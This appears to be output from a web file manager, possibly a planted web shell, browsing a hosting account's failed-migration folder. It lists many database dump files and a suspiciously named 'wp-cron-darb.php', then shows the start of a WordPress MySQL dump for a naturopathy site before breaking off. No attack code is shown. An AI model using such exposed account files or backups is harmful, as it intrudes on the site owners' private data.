/
home
/
desid573
/
cpmove_failed_mysql_dbs.1787413258
/
/home/desid573/cpmove_failed_mysql_dbs.1787413258
mkdir
upload
Name
Size
Mode
Actions
exmawjn/
-
0755
rm
hjfltmn/
-
0755
rm
iycwuxz/
-
0755
rm
pioxjd1/
-
0755
rm
desid573_1410_inventory.create
1532
0600
edit
dl
rm
desid573_1410_inventory.sql
13101
0644
edit
dl
rm
desid573_ample.create
1496
0600
edit
dl
rm
desid573_ample.sql
23499
0644
edit
dl
rm
desid573_angel_drivers.create
1528
0600
edit
dl
rm
desid573_angel_drivers.sql
46029
0644
edit
dl
rm
desid573_eway_codes.create
1516
0600
edit
dl
rm
desid573_eway_codes.sql
280056841
0644
edit
dl
rm
desid573_famcab_api.create
1516
0600
edit
dl
rm
desid573_famcab_api.sql
7099373
0644
edit
dl
rm
desid573_familycab.create
1512
0600
edit
dl
rm
desid573_familycab.sql
32255236
0644
edit
dl
rm
desid573_gcdriver.create
1508
0600
edit
dl
rm
desid573_gcdriver.sql
33498
0644
edit
dl
rm
desid573_ims.create
1488
0600
edit
dl
rm
desid573_ims.sql
13928
0644
edit
dl
rm
desid573_inquiries.create
1512
0600
edit
dl
rm
desid573_inquiries.sql
5094749
0644
edit
dl
rm
desid573_magic.create
1496
0600
edit
dl
rm
desid573_magic.sql
85568
0644
edit
dl
rm
desid573_magic_site.create
1516
0600
edit
dl
rm
desid573_magic_site.sql
1442
0644
edit
dl
rm
desid573_new_pro_api.create
1520
0600
edit
dl
rm
desid573_new_pro_api.sql
2709995
0644
edit
dl
rm
desid573_oldvine.create
1504
0600
edit
dl
rm
desid573_oldvine.sql
18141
0644
edit
dl
rm
desid573_phewl.create
1496
0600
edit
dl
rm
desid573_phewl.sql
53985
0644
edit
dl
rm
desid573_tollster.create
1508
0600
edit
dl
rm
desid573_tollster.sql
1221097
0644
edit
dl
rm
desid573_wp38.create
1492
0600
edit
dl
rm
desid573_wp38.sql
912231
0644
edit
dl
rm
desid573_wp172.create
1496
0600
edit
dl
rm
desid573_wp172.sql
175912
0644
edit
dl
rm
desid573_wp255.create
1500
0600
edit
dl
rm
desid573_wp255.sql
314501
0644
edit
dl
rm
desid573_wp676.create
1500
0600
edit
dl
rm
desid573_wp676.sql
12067179
0644
edit
dl
rm
desid573_wp_0a5zc.create
1508
0600
edit
dl
rm
desid573_wp_0a5zc.sql
123538
0644
edit
dl
rm
desid573_wp_new.create
1500
0600
edit
dl
rm
desid573_wp_new.sql
7810728
0644
edit
dl
rm
openfileslimit
5
0600
edit
dl
rm
wp-cron-darb.php
1659
0644
edit
dl
rm
Edit:
/home/desid573/cpmove_failed_mysql_dbs.1787413258/desid573_wp676.sql
(12067179B)
-- MySQL dump 10.13 Distrib 8.4.9, for Linux (x86_64) -- -- Host: localhost Database: desid573_wp676 -- ------------------------------------------------------ -- Server version 8.4.9-cll-lve /*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */; /*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */; /*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */; /*!50503 SET NAMES utf8mb4 */; /*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */; /*!40103 SET TIME_ZONE='+00:00' */; /*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */; /*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */; /*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */; /*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */; -- -- Current Database: `desid573_wp676` -- -- -- Table structure for table `wpln_actionscheduler_actions` -- DROP TABLE IF EXISTS `wpln_actionscheduler_actions`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!50503 SET character_set_client = utf8mb4 */; CREATE TABLE `wpln_actionscheduler_actions` ( `action_id` bigint unsigned NOT NULL AUTO_INCREMENT, `hook` varchar(191) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL, `status` varchar(20) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL, `scheduled_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `scheduled_date_local` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `args` varchar(191) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci DEFAULT NULL, `schedule` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci, `group_id` bigint unsigned NOT NULL DEFAULT '0', `attempts` int NOT NULL DEFAULT '0', `last_attempt_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `last_attempt_local` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `claim_id` bigint unsigned NOT NULL DEFAULT '0', `extended_args` varchar(8000) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci DEFAULT NULL, PRIMARY KEY (`action_id`), KEY `hook` (`hook`), KEY `status` (`status`), KEY `scheduled_date_gmt` (`scheduled_date_gmt`), KEY `args` (`args`), KEY `group_id` (`group_id`), KEY `last_attempt_gmt` (`last_attempt_gmt`), KEY `claim_id` (`claim_id`) ) ENGINE=MyISAM AUTO_INCREMENT=49961 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpln_actionscheduler_actions` -- LOCK TABLES `wpln_actionscheduler_actions` WRITE; /*!40000 ALTER TABLE `wpln_actionscheduler_actions` DISABLE KEYS */; INSERT INTO `wpln_actionscheduler_actions` (`action_id`, `hook`, `status`, `scheduled_date_gmt`, `scheduled_date_local`, `args`, `schedule`, `group_id`, `attempts`, `last_attempt_gmt`, `last_attempt_local`, `claim_id`, `extended_args`) VALUES (49942,'aioseo_cache_prune','pending','2026-05-20 22:05:36','2026-05-20 22:05:36','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1779314736;s:18:\"\0*\0first_timestamp\";i:1651490289;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1779314736;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',1,0,'0000-00-00 00:00:00','0000-00-00 00:00:00',0,NULL),(49959,'aioseo_image_sitemap_scan','pending','2026-05-20 05:29:32','2026-05-20 05:29:32','[]','O:30:\"ActionScheduler_SimpleSchedule\":2:{s:22:\"\0*\0scheduled_timestamp\";i:1779254972;s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1779254972;}',1,0,'0000-00-00 00:00:00','0000-00-00 00:00:00',0,NULL),(49960,'aioseo_admin_notifications_update','complete','0000-00-00 00:00:00','0000-00-00 00:00:00','[]','O:28:\"ActionScheduler_NullSchedule\":0:{}',1,1,'2026-05-20 05:14:43','2026-05-20 13:14:43',0,NULL); /*!40000 ALTER TABLE `wpln_actionscheduler_actions` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpln_actionscheduler_claims` -- DROP TABLE IF EXISTS `wpln_actionscheduler_claims`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!50503 SET character_set_client = utf8mb4 */; CREATE TABLE `wpln_actionscheduler_claims` ( `claim_id` bigint unsigned NOT NULL AUTO_INCREMENT, `date_created_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', PRIMARY KEY (`claim_id`), KEY `date_created_gmt` (`date_created_gmt`) ) ENGINE=MyISAM AUTO_INCREMENT=142250 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpln_actionscheduler_claims` -- LOCK TABLES `wpln_actionscheduler_claims` WRITE; /*!40000 ALTER TABLE `wpln_actionscheduler_claims` DISABLE KEYS */; /*!40000 ALTER TABLE `wpln_actionscheduler_claims` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpln_actionscheduler_groups` -- DROP TABLE IF EXISTS `wpln_actionscheduler_groups`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!50503 SET character_set_client = utf8mb4 */; CREATE TABLE `wpln_actionscheduler_groups` ( `group_id` bigint unsigned NOT NULL AUTO_INCREMENT, `slug` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL, PRIMARY KEY (`group_id`), KEY `slug` (`slug`(191)) ) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpln_actionscheduler_groups` -- LOCK TABLES `wpln_actionscheduler_groups` WRITE; /*!40000 ALTER TABLE `wpln_actionscheduler_groups` DISABLE KEYS */; INSERT INTO `wpln_actionscheduler_groups` (`group_id`, `slug`) VALUES (1,'aioseo'),(2,'action-scheduler-migration'); /*!40000 ALTER TABLE `wpln_actionscheduler_groups` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpln_actionscheduler_logs` -- DROP TABLE IF EXISTS `wpln_actionscheduler_logs`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!50503 SET character_set_client = utf8mb4 */; CREATE TABLE `wpln_actionscheduler_logs` ( `log_id` bigint unsigned NOT NULL AUTO_INCREMENT, `action_id` bigint unsigned NOT NULL, `message` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL, `log_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `log_date_local` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', PRIMARY KEY (`log_id`), KEY `action_id` (`action_id`), KEY `log_date_gmt` (`log_date_gmt`) ) ENGINE=MyISAM AUTO_INCREMENT=148715 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpln_actionscheduler_logs` -- LOCK TABLES `wpln_actionscheduler_logs` WRITE; /*!40000 ALTER TABLE `wpln_actionscheduler_logs` DISABLE KEYS */; INSERT INTO `wpln_actionscheduler_logs` (`log_id`, `action_id`, `message`, `log_date_gmt`, `log_date_local`) VALUES (148710,49959,'action created','2026-05-20 05:14:32','2026-05-20 05:14:32'),(148712,49960,'action created','2026-05-20 05:14:40','2026-05-20 05:14:40'),(148713,49960,'action started via Async Request','2026-05-20 05:14:42','2026-05-20 05:14:42'),(148714,49960,'action complete via Async Request','2026-05-20 05:14:43','2026-05-20 05:14:43'),(148660,49942,'action created','2026-05-19 22:05:36','2026-05-19 22:05:36'); /*!40000 ALTER TABLE `wpln_actionscheduler_logs` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpln_aioseo_cache` -- DROP TABLE IF EXISTS `wpln_aioseo_cache`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!50503 SET character_set_client = utf8mb4 */; CREATE TABLE `wpln_aioseo_cache` ( `id` bigint unsigned NOT NULL AUTO_INCREMENT, `key` varchar(80) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL, `value` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL, `expiration` datetime DEFAULT NULL, `created` datetime NOT NULL, `updated` datetime NOT NULL, PRIMARY KEY (`id`), UNIQUE KEY `ndx_aioseo_cache_key` (`key`), KEY `ndx_aioseo_cache_expiration` (`expiration`) ) ENGINE=MyISAM AUTO_INCREMENT=428 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpln_aioseo_cache` -- LOCK TABLES `wpln_aioseo_cache` WRITE; /*!40000 ALTER TABLE `wpln_aioseo_cache` DISABLE KEYS */; INSERT INTO `wpln_aioseo_cache` (`id`, `key`, `value`, `expiration`, `created`, `updated`) VALUES (408,'9afcdfbc9018b536e18d7d16ed407085d4007dad','s:3:\"205\";','2026-05-20 06:14:30','2026-04-27 14:29:27','2026-05-19 06:14:30'),(4,'aioseo_sitemap_post-archive-sitemap.xml','a:3:{s:6:\"counts\";a:0:{}s:8:\"datetime\";a:0:{}s:10:\"pagination\";a:2:{s:7:\"showing\";i:0;s:5:\"total\";i:0;}}','2026-06-17 16:48:30','2023-09-06 18:39:15','2026-05-18 16:48:30'),(5,'aioseo_sitemap_sitemap.rss','a:3:{s:6:\"counts\";a:0:{}s:8:\"datetime\";a:8:{s:41:\"https://verdenaturopathy.com.au/services/\";a:2:{s:4:\"date\";s:17:\"February 19, 2026\";s:4:\"time\";s:7:\"1:18 pm\";}s:40:\"https://verdenaturopathy.com.au/contact/\";a:2:{s:4:\"date\";s:16:\"October 20, 2025\";s:4:\"time\";s:7:\"2:18 pm\";}s:32:\"https://verdenaturopathy.com.au/\";a:2:{s:4:\"date\";s:16:\"October 20, 2025\";s:4:\"time\";s:7:\"2:16 pm\";}s:38:\"https://verdenaturopathy.com.au/about/\";a:2:{s:4:\"date\";s:15:\"October 2, 2025\";s:4:\"time\";s:8:\"10:48 am\";}s:41:\"https://verdenaturopathy.com.au/bookings/\";a:2:{s:4:\"date\";s:13:\"June 14, 2021\";s:4:\"time\";s:7:\"2:38 pm\";}s:44:\"https://verdenaturopathy.com.au/sample-page/\";a:2:{s:4:\"date\";s:12:\"May 27, 2021\";s:4:\"time\";s:7:\"2:01 pm\";}s:47:\"https://verdenaturopathy.com.au/privacy-policy/\";a:2:{s:4:\"date\";s:12:\"May 25, 2021\";s:4:\"time\";s:7:\"9:44 pm\";}s:37:\"https://verdenaturopathy.com.au/blog/\";a:2:{s:4:\"date\";s:14:\"April 30, 2021\";s:4:\"time\";s:7:\"8:05 pm\";}}s:10:\"pagination\";a:2:{s:7:\"showing\";i:8;s:5:\"total\";i:8;}}','2026-06-19 04:18:00','2023-09-06 20:55:10','2026-05-20 04:18:00'),(6,'aioseo_sitemap_sitemap.xml','a:3:{s:6:\"counts\";a:5:{s:48:\"https://verdenaturopathy.com.au/page-sitemap.xml\";i:8;s:56:\"https://verdenaturopathy.com.au/post-archive-sitemap.xml\";i:1;s:55:\"https://verdenaturopathy.com.au/layout_type-sitemap.xml\";i:1;s:49:\"https://verdenaturopathy.com.au/scope-sitemap.xml\";i:2;s:56:\"https://verdenaturopathy.com.au/module_width-sitemap.xml\";i:1;}s:8:\"datetime\";a:4:{s:48:\"https://verdenaturopathy.com.au/page-sitemap.xml\";a:2:{s:4:\"date\";s:17:\"February 19, 2026\";s:4:\"time\";s:7:\"1:18 pm\";}s:55:\"https://verdenaturopathy.com.au/layout_type-sitemap.xml\";a:2:{s:4:\"date\";s:15:\"October 2, 2025\";s:4:\"time\";s:8:\"10:53 am\";}s:49:\"https://verdenaturopathy.com.au/scope-sitemap.xml\";a:2:{s:4:\"date\";s:15:\"October 2, 2025\";s:4:\"time\";s:8:\"10:53 am\";}s:56:\"https://verdenaturopathy.com.au/module_width-sitemap.xml\";a:2:{s:4:\"date\";s:15:\"October 2, 2025\";s:4:\"time\";s:8:\"10:53 am\";}}s:10:\"pagination\";a:2:{s:7:\"showing\";i:5;s:5:\"total\";i:5;}}','2026-06-19 04:19:55','2023-09-07 05:21:27','2026-05-20 04:19:55'),(7,'aioseo_sitemap_page-sitemap.xml','a:3:{s:6:\"counts\";a:0:{}s:8:\"datetime\";a:8:{s:32:\"https://verdenaturopathy.com.au/\";a:2:{s:4:\"date\";s:16:\"October 20, 2025\";s:4:\"time\";s:7:\"2:16 pm\";}s:41:\"https://verdenaturopathy.com.au/services/\";a:2:{s:4:\"date\";s:17:\"February 19, 2026\";s:4:\"time\";s:7:\"1:18 pm\";}s:40:\"https://verdenaturopathy.com.au/contact/\";a:2:{s:4:\"date\";s:16:\"October 20, 2025\";s:4:\"time\";s:7:\"2:18 pm\";}s:38:\"https://verdenaturopathy.com.au/about/\";a:2:{s:4:\"date\";s:15:\"October 2, 2025\";s:4:\"time\";s:8:\"10:48 am\";}s:41:\"https://verdenaturopathy.com.au/bookings/\";a:2:{s:4:\"date\";s:13:\"June 14, 2021\";s:4:\"time\";s:7:\"2:38 pm\";}s:44:\"https://verdenaturopathy.com.au/sample-page/\";a:2:{s:4:\"date\";s:12:\"May 27, 2021\";s:4:\"time\";s:7:\"2:01 pm\";}s:47:\"https://verdenaturopathy.com.au/privacy-policy/\";a:2:{s:4:\"date\";s:12:\"May 25, 2021\";s:4:\"time\";s:7:\"9:44 pm\";}s:37:\"https://verdenaturopathy.com.au/blog/\";a:2:{s:4:\"date\";s:14:\"April 30, 2021\";s:4:\"time\";s:7:\"8:05 pm\";}}s:10:\"pagination\";a:2:{s:7:\"showing\";i:8;s:5:\"total\";i:8;}}','2026-06-18 02:23:05','2023-09-07 23:41:58','2026-05-19 02:23:05'),(94,'aioseo_sitemap_module_width-sitemap.xml','a:3:{s:6:\"counts\";a:0:{}s:8:\"datetime\";a:1:{s:53:\"https://verdenaturopathy.com.au/module_width/regular/\";a:2:{s:4:\"date\";s:15:\"October 2, 2025\";s:4:\"time\";s:8:\"10:53 am\";}}s:10:\"pagination\";a:2:{s:7:\"showing\";i:1;s:5:\"total\";i:1;}}','2026-06-17 16:48:30','2024-04-22 18:45:27','2026-05-18 16:48:30'),(95,'aioseo_sitemap_scope-sitemap.xml','a:3:{s:6:\"counts\";a:0:{}s:8:\"datetime\";a:2:{s:45:\"https://verdenaturopathy.com.au/scope/global/\";a:2:{s:4:\"date\";s:15:\"October 2, 2025\";s:4:\"time\";s:8:\"10:53 am\";}s:49:\"https://verdenaturopathy.com.au/scope/not_global/\";a:2:{s:4:\"date\";s:13:\"April 1, 2025\";s:4:\"time\";s:7:\"8:08 pm\";}}s:10:\"pagination\";a:2:{s:7:\"showing\";i:2;s:5:\"total\";i:2;}}','2026-06-17 16:48:30','2024-04-22 18:46:20','2026-05-18 16:48:30'),(96,'aioseo_sitemap_layout_type-sitemap.xml','a:3:{s:6:\"counts\";a:0:{}s:8:\"datetime\";a:1:{s:52:\"https://verdenaturopathy.com.au/layout_type/section/\";a:2:{s:4:\"date\";s:15:\"October 2, 2025\";s:4:\"time\";s:8:\"10:53 am\";}}s:10:\"pagination\";a:2:{s:7:\"showing\";i:1;s:5:\"total\";i:1;}}','2026-06-17 16:48:30','2024-04-22 18:49:55','2026-05-18 16:48:30'),(407,'aioseo_sitemap_news-sitemap.xml','a:3:{s:6:\"counts\";a:0:{}s:8:\"datetime\";a:0:{}s:10:\"pagination\";a:2:{s:7:\"showing\";i:0;s:5:\"total\";i:0;}}','2026-05-26 13:39:54','2026-04-23 06:40:28','2026-04-26 13:39:54'),(401,'aioseo_sitemap_author-sitemap.xml','a:3:{s:6:\"counts\";a:0:{}s:8:\"datetime\";a:0:{}s:10:\"pagination\";a:2:{s:7:\"showing\";i:0;s:5:\"total\";i:0;}}','2026-06-10 06:56:03','2026-03-24 23:17:27','2026-05-11 06:56:03'),(405,'aioseo_sitemap_user-sitemap.xml','a:3:{s:6:\"counts\";a:0:{}s:8:\"datetime\";a:0:{}s:10:\"pagination\";a:2:{s:7:\"showing\";i:0;s:5:\"total\";i:0;}}','2026-06-10 06:56:03','2026-04-13 09:01:14','2026-05-11 06:56:03'),(423,'admin_notifications_update','i:1779340480;','2026-05-21 05:14:40','2026-05-20 05:14:40','2026-05-20 05:14:40'),(424,'addons','a:9:{i:0;O:8:\"stdClass\":15:{s:3:\"sku\";s:16:\"aioseo-redirects\";s:4:\"name\";s:19:\"Redirection Manager\";s:7:\"version\";s:6:\"1.4.15\";s:5:\"image\";N;s:4:\"icon\";s:480:\"PHN2ZyB2aWV3Qm94PSIwIDAgMjQgMjQiIGZpbGw9Im5vbmUiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgY2xhc3M9ImFpb3Nlby1yZWRpcmVjdCI+PHBhdGggZmlsbC1ydWxlPSJldmVub2RkIiBjbGlwLXJ1bGU9ImV2ZW5vZGQiIGQ9Ik0xMC41OSA5LjE3TDUuNDEgNEw0IDUuNDFMOS4xNyAxMC41OEwxMC41OSA5LjE3Wk0xNC41IDRMMTYuNTQgNi4wNEw0IDE4LjU5TDUuNDEgMjBMMTcuOTYgNy40NkwyMCA5LjVWNEgxNC41Wk0xMy40MiAxNC44MkwxNC44MyAxMy40MUwxNy45NiAxNi41NEwyMCAxNC41VjIwSDE0LjVMMTYuNTUgMTcuOTVMMTMuNDIgMTQuODJaIiBmaWxsPSJjdXJyZW50Q29sb3IiIC8+PC9zdmc+\";s:6:\"levels\";a:4:{i:0;s:8:\"business\";i:1;s:6:\"agency\";i:2;s:3:\"pro\";i:3;s:5:\"elite\";}s:13:\"currentLevels\";a:2:{i:0;s:3:\"pro\";i:1;s:5:\"elite\";}s:15:\"requiresUpgrade\";b:1;s:11:\"description\";s:101:\"<p>Our Redirection Manager allows you to create and manage redirects for 404s or modified posts.</p>\n\";s:18:\"descriptionVersion\";i:0;s:11:\"downloadUrl\";s:0:\"\";s:10:\"productUrl\";s:48:\"https://aioseo.com/features/redirection-manager/\";s:12:\"learnMoreUrl\";s:48:\"https://aioseo.com/features/redirection-manager/\";s:9:\"manageUrl\";s:40:\"https://route#aioseo-redirects:redirects\";s:8:\"features\";a:1:{i:0;O:8:\"stdClass\":2:{s:13:\"license_level\";s:5:\"elite\";s:7:\"feature\";s:19:\"404-parent-redirect\";}}}i:1;O:8:\"stdClass\":15:{s:3:\"sku\";s:21:\"aioseo-link-assistant\";s:4:\"name\";s:14:\"Link Assistant\";s:7:\"version\";s:6:\"1.1.14\";s:5:\"image\";N;s:4:\"icon\";s:516:\"PHN2ZyB2aWV3Qm94PSIwIDAgMjQgMjQiIGZpbGw9Im5vbmUiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+PHBhdGggZmlsbC1ydWxlPSJldmVub2RkIiBjbGlwLXJ1bGU9ImV2ZW5vZGQiIGQ9Ik0xMSAxNUg3QzUuMzUgMTUgNCAxMy42NSA0IDEyQzQgMTAuMzUgNS4zNSA5IDcgOUgxMVY3SDdDNC4yNCA3IDIgOS4yNCAyIDEyQzIgMTQuNzYgNC4yNCAxNyA3IDE3SDExVjE1Wk0xNyA3SDEzVjlIMTdDMTguNjUgOSAyMCAxMC4zNSAyMCAxMkMyMCAxMy42NSAxOC42NSAxNSAxNyAxNUgxM1YxN0gxN0MxOS43NiAxNyAyMiAxNC43NiAyMiAxMkMyMiA5LjI0IDE5Ljc2IDcgMTcgN1pNMTYgMTFIOFYxM0gxNlYxMVoiIGZpbGw9ImN1cnJlbnRDb2xvciIvPjwvc3ZnPgo=\";s:6:\"levels\";a:3:{i:0;s:6:\"agency\";i:1;s:3:\"pro\";i:2;s:5:\"elite\";}s:13:\"currentLevels\";a:2:{i:0;s:3:\"pro\";i:1;s:5:\"elite\";}s:15:\"requiresUpgrade\";b:1;s:11:\"description\";s:283:\"<p>Super-charge your SEO with Link Assistant! Get relevant suggestions for adding internal links to older content as well as finding any orphaned posts that have no internal links. Use our reporting feature to see all link suggestions or add them directly from any page or post.</p>\n\";s:18:\"descriptionVersion\";i:0;s:11:\"downloadUrl\";s:0:\"\";s:10:\"productUrl\";s:39:\"https://aioseo.com/docs/link-assistant/\";s:12:\"learnMoreUrl\";s:39:\"https://aioseo.com/docs/link-assistant/\";s:9:\"manageUrl\";s:44:\"https://route#aioseo-link-assistant:overview\";s:8:\"features\";a:0:{}}i:2;O:8:\"stdClass\":15:{s:3:\"sku\";s:20:\"aioseo-video-sitemap\";s:4:\"name\";s:13:\"Video Sitemap\";s:7:\"version\";s:6:\"1.1.26\";s:5:\"image\";N;s:4:\"icon\";s:420:\"PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9IjAgMCAyMCAyMCI+PHBhdGggZmlsbC1ydWxlPSJldmVub2RkIiBkPSJNMy4zMzMgNWgxMGMuNDU5IDAgLjgzNC4zNzUuODM0LjgzM1Y4Ljc1TDE3LjUgNS40MTd2OS4xNjZsLTMuMzMzLTMuMzMzdjIuOTE3YS44MzYuODM2IDAgMCAxLS44MzQuODMzaC0xMGEuODM2LjgzNiAwIDAgMS0uODMzLS44MzNWNS44MzNjMC0uNDU4LjM3NS0uODMzLjgzMy0uODMzWm05LjE2NyA4LjMzM1Y2LjY2N0g0LjE2N3Y2LjY2NkgxMi41WiIgY2xpcC1ydWxlPSJldmVub2RkIi8+PC9zdmc+\";s:6:\"levels\";a:5:{i:0;s:10:\"individual\";i:1;s:8:\"business\";i:2;s:6:\"agency\";i:3;s:3:\"pro\";i:4;s:5:\"elite\";}s:13:\"currentLevels\";a:2:{i:0;s:3:\"pro\";i:1;s:5:\"elite\";}s:15:\"requiresUpgrade\";b:1;s:11:\"description\";s:243:\"<p>The Video Sitemap works in much the same way as the XML Sitemap module, it generates an XML Sitemap specifically for video content on your site. Search engines use this information to display rich snippet information in search results.</p>\n\";s:18:\"descriptionVersion\";i:0;s:11:\"downloadUrl\";s:0:\"\";s:10:\"productUrl\";s:54:\"https://aioseo.com/docs/how-to-create-a-video-sitemap/\";s:12:\"learnMoreUrl\";s:54:\"https://aioseo.com/docs/how-to-create-a-video-sitemap/\";s:9:\"manageUrl\";s:43:\"https://route#aioseo-sitemaps:video-sitemap\";s:8:\"features\";a:0:{}}i:3;O:8:\"stdClass\":15:{s:3:\"sku\";s:21:\"aioseo-local-business\";s:4:\"name\";s:18:\"Local Business SEO\";s:7:\"version\";s:6:\"1.3.13\";s:5:\"image\";N;s:4:\"icon\";s:18:\"svg-local-business\";s:6:\"levels\";a:5:{i:0;s:8:\"business\";i:1;s:6:\"agency\";i:2;s:4:\"plus\";i:3;s:3:\"pro\";i:4;s:5:\"elite\";}s:13:\"currentLevels\";a:3:{i:0;s:4:\"plus\";i:1;s:3:\"pro\";i:2;s:5:\"elite\";}s:15:\"requiresUpgrade\";b:1;s:11:\"description\";s:253:\"<p>Local Business schema markup enables you to tell Google about your business, including your business name, address and phone number, opening hours and price range. This information may be displayed as a Knowledge Graph card or business carousel.</p>\n\";s:18:\"descriptionVersion\";i:0;s:11:\"downloadUrl\";s:0:\"\";s:10:\"productUrl\";s:43:\"https://aioseo.com/docs/local-business-seo/\";s:12:\"learnMoreUrl\";s:43:\"https://aioseo.com/docs/local-business-seo/\";s:9:\"manageUrl\";s:40:\"https://route#aioseo-local-seo:locations\";s:8:\"features\";a:0:{}}i:4;O:8:\"stdClass\":15:{s:3:\"sku\";s:19:\"aioseo-news-sitemap\";s:4:\"name\";s:12:\"News Sitemap\";s:7:\"version\";s:6:\"1.0.21\";s:5:\"image\";N;s:4:\"icon\";s:16:\"svg-sitemaps-pro\";s:6:\"levels\";a:4:{i:0;s:8:\"business\";i:1;s:6:\"agency\";i:2;s:3:\"pro\";i:3;s:5:\"elite\";}s:13:\"currentLevels\";a:2:{i:0;s:3:\"pro\";i:1;s:5:\"elite\";}s:15:\"requiresUpgrade\";b:1;s:11:\"description\";s:284:\"<p>Our Google News Sitemap lets you control which content you submit to Google News and only contains articles that were published in the last 48 hours. In order to submit a News Sitemap to Google, you must have added your site to Google’s Publisher Center and had it approved.</p>\n\";s:18:\"descriptionVersion\";i:0;s:11:\"downloadUrl\";s:0:\"\";s:10:\"productUrl\";s:60:\"https://aioseo.com/docs/how-to-create-a-google-news-sitemap/\";s:12:\"learnMoreUrl\";s:60:\"https://aioseo.com/docs/how-to-create-a-google-news-sitemap/\";s:9:\"manageUrl\";s:42:\"https://route#aioseo-sitemaps:news-sitemap\";s:8:\"features\";a:0:{}}i:5;O:8:\"stdClass\":15:{s:3:\"sku\";s:16:\"aioseo-index-now\";s:4:\"name\";s:8:\"IndexNow\";s:7:\"version\";s:6:\"1.0.13\";s:5:\"image\";N;s:4:\"icon\";s:1836:\"PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9IjAgMCAyMCAyMCI+PHBhdGggZD0iTTE3LjY0NCAxMS42NTVjLS4zMjEtLjIyOS0uNjU0LS40NDYtLjk2NC0uNjk3LS42NDMtLjUzNC0uNjMxLTEuMzcyLjAyMy0xLjg4NC4zMS0uMjQuNjQyLS40NTguOTY0LS42OTcuMTg0LS4xMy4zMjEtLjI5NC4zMzMtLjUzNCAwLS4wMzIgMC0uMDc2LS4wMTItLjEyYTcuNDQyIDcuNDQyIDAgMCAwLTEuODkzLTMuMTQ3Yy0uMjA3LS4yMDctLjQ2LS4yNC0uNzQ2LS4xMmEyMi4wNSAyMi4wNSAwIDAgMS0xLjA2OC40MzZjLS45MTguMzQ4LTEuNjg3LS4wODctMS44MTMtMS4wMjQtLjA0Ni0uMzM4LS4wOC0uNjc1LS4xMTUtMS4wMTMtLjAzNC0uMzctLjI0LS41OTktLjYzLS42NzVhOC40NDYgOC40NDYgMCAwIDAtMy40NjcgMGMtLjM2Ny4wNzYtLjU3NC4yNzItLjYwOC42MzJhMTMuNzggMTMuNzggMCAwIDEtLjE2IDEuMTc2Yy0uMTYxLjgyOC0uOTE5IDEuMjMtMS43NDUuOTE1LS4zNTYtLjEzLS43MTItLjI5NC0xLjA2Ny0uNDQ3LS4zMzMtLjE0MS0uNjA5LS4wODctLjg1LjE2NGE3Ljc3OSA3Ljc3OSAwIDAgMC0xLjc3OSAyLjkxOGMtLjExNC4zMzgtLjAyMy42MS4yODcuODI4LjI5OS4yMDcuNjA5LjQxNC